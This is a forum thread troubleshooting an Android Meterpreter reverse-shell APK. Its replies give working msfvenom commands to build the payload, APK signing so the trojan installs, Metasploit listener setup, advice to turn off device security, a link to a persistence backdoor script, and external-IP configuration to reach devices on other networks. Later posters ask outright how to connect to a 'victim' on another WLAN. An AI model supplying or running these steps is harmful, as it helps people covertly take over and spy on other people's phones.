Forum Thread: Android Doesn't Connect Back to Metasploit with App Payload?

Android Doesn't Connect Back to Metasploit with App Payload?

I am trying to connect my android device to metasploit via reverse tcp, but it never shows up on the console. I have a Nexus 5 running Nethunter and Android 5.1.1

The command I used was: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.124 LPORT=4444 R > base.apk

In my case, 192.168.43.124 is the attacker machine, and 4444 is the default port that Metasploit gave me. From my understanding, the phone's IP isn't important. I have tried this on multiple devices and networks and can't get it to connect.

Do I need to select architecture, or runtime?

10 Responses

If you are using internal IP, devices have to be in one subnet. In other case, you have to set port forwarding.

So what did you do? You connected android device to the network, then installed ap, and created session in msfconsole on atacker's machine?

Pretty Much. Every tutorial I have seen just connects it all like so, and it all seems to work for them.

This might be a redundant question but did you start a listener?

1- msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.124 LPORT=4444 R -t apk -o test.apk_

2- msfconsole
use multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.43.124
set LPORT 4444
exploit

Now, you have 5.1.1 and with every update they might have patched something, so don't expect every exploit to work as fine as on older versions. However this is not an exploit per se and bases on a simple outgoing connection. Still, you might have an antivirus or protection software or god knows what on the newest versions ( I didn't upgrade yet so I don't know) so switch any built in or side-app security that could block suspicious connections. The things you specified you've done are correct (assuming the phone is inside the network and that you've set up the handler correctly as HXR ROFO said). Try signing the app with d2j-apk-sign if you have trouble installing it. -Ne-py

Is your phone connected to same wifi as your pc??

Try putting your private ip in your lhost when making the payload...

Also see if the app isnt opening on phone or it is being closed by some other app..

Hi, I supose you found your way round this, but anyway I will share the solution I found for others that can read this:

1) Generate the android payload:
# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.124 LPORT=4444 R > /root/base.apk

2) Sign the payload.apk:
# d2j-apk-sign -w base.apk
(This will generate base-signed.apk, change name if desired...)

3) Start Listener:
# msfconsole
> use exploit/multi/handler
> set payload android/meterpreter/reverse_tcp
> set LHOST 192.168.1.124
> exploit

4) Install apk on your phone.

Remember to delete the app (MainActivity) if the conection fails before you try again...

Even though I managed to get connection, it seams to drop quite fast, some times it hardly connects and drops instantly. I supose this depends on the device as on another old device connection last a bit longer. The only solution I found was to install a persistence script and try to gain connection back by restarting the listener, but still I wonder if there's a way to keep connection alive.

Here is the link from this forum where I saw the persitence script:
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/

(If the script fails delete the "--user 0" option in the script, in my case it worked, but first try as it comes...)

Hope this helps, if I find anything else I will come back to share.

android payload work only same network but outside of network can't work any idea of this problem
# msfvenom -p android/meterpreter/reversetcp LHOST=192.168.43.124 LPORT=4444 R > /root/base.apk

To make an external IP payload you must especify your external IP.

Visit dnsleaktest.com or ipchicken.com for example and copy your external IP.

Then replace your internal IP in the payload:

# msfvenom -p android/meterpreter/reverse_tcp LHOST=EXTERNAL_IP LPORT=4444 R > /root/base.apk

In addition you could redirect the traffic from the 4444 port to your internal IP in the router settings, just to make sure it arrives your machine, I did it, but not sure if we could skip this and still work...

EDIT: I just remebered, if you set the port 4444 on the multi/handler listener in metasploit I really don't think you need to redirect traffic on the router settings, I will give it a try when I get some time.

Same here it only get connect while the victim on the same network, how i can get connected to a victim who connect to another wlan ???

Share Your Thoughts

  • Hot
  • Active